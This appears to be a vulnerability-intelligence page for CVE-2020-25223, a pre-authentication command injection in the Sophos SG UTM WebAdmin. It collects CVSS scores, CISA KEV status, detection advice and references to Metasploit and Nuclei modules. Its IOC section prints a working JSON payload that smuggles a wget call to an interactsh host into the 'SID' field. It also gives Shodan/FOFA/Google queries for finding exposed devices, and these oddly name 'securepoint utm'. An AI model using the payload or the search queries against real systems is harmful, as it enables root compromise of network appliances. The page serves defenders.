CVE-2020-25223
published 2020-09-25CVE-2020-25223: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
96.69%
99.9th percentile
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sophos | unified_threat_management | < 9.511 | 9.511 |
| sophos | unified_threat_management | — | — |
| sophos | unified_threat_management | — | — |
| sophos | unified_threat_management | — | — |
| sophos | unified_threat_management | >= 9.600 < 9.607 | 9.607 |
| sophos | unified_threat_management | >= 9.700 < 9.705 | 9.705 |
Detection & IOCsextracted from sources · hover to see the quote
other{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}↗
- →Monitor for unauthenticated POST requests to the /var endpoint on the Sophos UTM WebAdmin interface, particularly with a JSON body containing a 'SID' field with shell metacharacters (e.g., pipe characters '|') indicating command injection attempts. ↗
- →Detect JSON payloads where the 'SID' field contains pipe-delimited OS commands rather than a legitimate session identifier, as this is the injection vector for CVE-2020-25223. ↗
- →Look for the 'FID': 'init' field in POST request bodies to /var as part of the exploit trigger sequence. ↗
- →Use Shodan/FOFA/Google dorks to identify exposed Sophos UTM WebAdmin instances: Shodan query 'http.title:"securepoint utm"', FOFA 'title="securepoint utm"', Google 'intitle:"securepoint utm"'. ↗
- →The exploit is pre-authentication (no valid session required); alert on any unauthenticated JSON POST to /var with Content-Type: application/json from external IPs. ↗
- →Confirm exploitation via out-of-band HTTP interaction (OAST): watch for unexpected outbound HTTP/DNS requests from the UTM host following a suspicious POST to /var. ↗
- ·Vulnerability affects only Sophos SG UTM versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11; patched versions are not affected. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pwxx-2hrw-72w5: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9
ghsa_unreviewed·2022-05-24
CVE-2020-25223 [CRITICAL] CWE-78 GHSA-pwxx-2hrw-72w5: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
VulnCheck
Sophos SG UTM Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-25223 [CRITICAL] CWE-78 Sophos SG UTM Remote Code Execution Vulnerability
Sophos SG UTM Remote Code Execution Vulnerability
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM.
Affected: Sophos SG UTM
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://fortiguard.fortinet.com/threat-signal-report/4926/new-zerobot-variant-exploits-additional-vulnerabilities-for-propagation; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&date=2025-10-17; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&date=2025-10-18; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&date=2025-10-19; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&dat
CISA
Sophos SG UTM Remote Code Execution Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2020-25223 [CRITICAL] CWE-78 Sophos SG UTM Remote Code Execution Vulnerability
Vulnerability: Sophos SG UTM Remote Code Execution Vulnerability
Affected: Sophos SG UTM
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-25223
Remediation Due Date: 2022-04-15
No detection rules found.
Metasploit
Sophos UTM WebAdmin SID Command Injection
metasploit
Sophos UTM WebAdmin SID Command Injection
Sophos UTM WebAdmin SID Command Injection
This module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user.
Nuclei
Sophos UTM Preauth - Remote Code Execution
nuclei·CVSS 9.8
CVE-2020-25223 [CRITICAL] Sophos UTM Preauth - Remote Code Execution
Sophos UTM Preauth - Remote Code Execution
Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
Template:
id: CVE-2020-25223
info:
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
remediation: |
Apply the latest security patches provided by Sophos to mitigate the vulnerability.
reference:
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
- https://comm
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
http://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.htmlhttps://community.sophos.com/b/security-bloghttps://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223https://cwe.mitre.org/data/definitions/78.htmlhttps://www.secpod.com/blog/remote-code-execution-in-sophos-utm/http://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.htmlhttps://community.sophos.com/b/security-bloghttps://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223https://cwe.mitre.org/data/definitions/78.htmlhttps://www.secpod.com/blog/remote-code-execution-in-sophos-utm/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-25223
2020-09-25
Published
2022-03-25
Added to CISA KEV
Exploited in the wild